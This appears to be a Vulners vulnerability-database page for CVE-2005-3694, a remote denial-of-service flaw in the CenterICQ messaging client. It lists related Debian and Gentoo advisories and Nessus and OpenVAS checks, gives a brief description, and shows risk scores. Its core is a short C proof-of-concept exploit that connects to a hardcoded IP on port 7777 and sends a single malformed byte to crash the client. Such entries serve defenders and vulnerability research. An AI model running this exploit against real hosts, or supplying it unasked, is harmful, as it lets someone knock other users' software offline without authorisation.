CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2005-3694 | 20 Nov 200520:00 | – | cve | |
| CVE-2005-3694 | 20 Nov 200520:00 | – | cvelist | |
| [SECURITY] [DSA 912-1] New centericq packages fix denial of service | 30 Nov 200510:53 | – | debian | |
| [SECURITY] [DSA 912-1] New centericq packages fix denial of service | 30 Nov 200510:53 | – | debian | |
| Debian DSA-912-1 : centericq - denial of service | 14 Oct 200600:00 | – | nessus | |
| GLSA-200512-11 : CenterICQ: Multiple vulnerabilities | 30 Dec 200500:00 | – | nessus | |
| CenterICQ: Multiple vulnerabilities | 20 Dec 200500:00 | – | gentoo | |
| CVE-2005-3694 | 20 Nov 200520:03 | – | nvd | |
| Debian: Security Advisory (DSA-912-1) | 17 Jan 200800:00 | – | openvas | |
| Gentoo Security Advisory GLSA 200512-11 (CenterICQ) | 24 Sep 200800:00 | – | openvas |
10
// source: https://www.securityfocus.com/bid/15649/info
CenterICQ is prone to a remote denial-of-service vulnerability.
The vulnerability presents itself when the client is running on a computer that is directly connected to the Internet and handles malformed packets on the listening port for ICQ messages.
A successful attack can cause the client to crash.
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define DEST_IP "192.168.1.33"
#define DEST_PORT 7777
main()
{
int sockfd;
struct sockaddr_in dest_addr; // will hold the destination addr
sockfd = socket(AF_INET, SOCK_STREAM, 0); // do some error checking!
dest_addr.sin_family = AF_INET; // host byte order
dest_addr.sin_port = htons(DEST_PORT); // short, network byte order
dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
memset(&(dest_addr.sin_zero), '\0', 8); // zero the rest of the struct
// don't forget to error check the connect()!
connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
char *msg[] = { 0x01 };
send(sockfd, msg, 1, 0);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jul 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.11988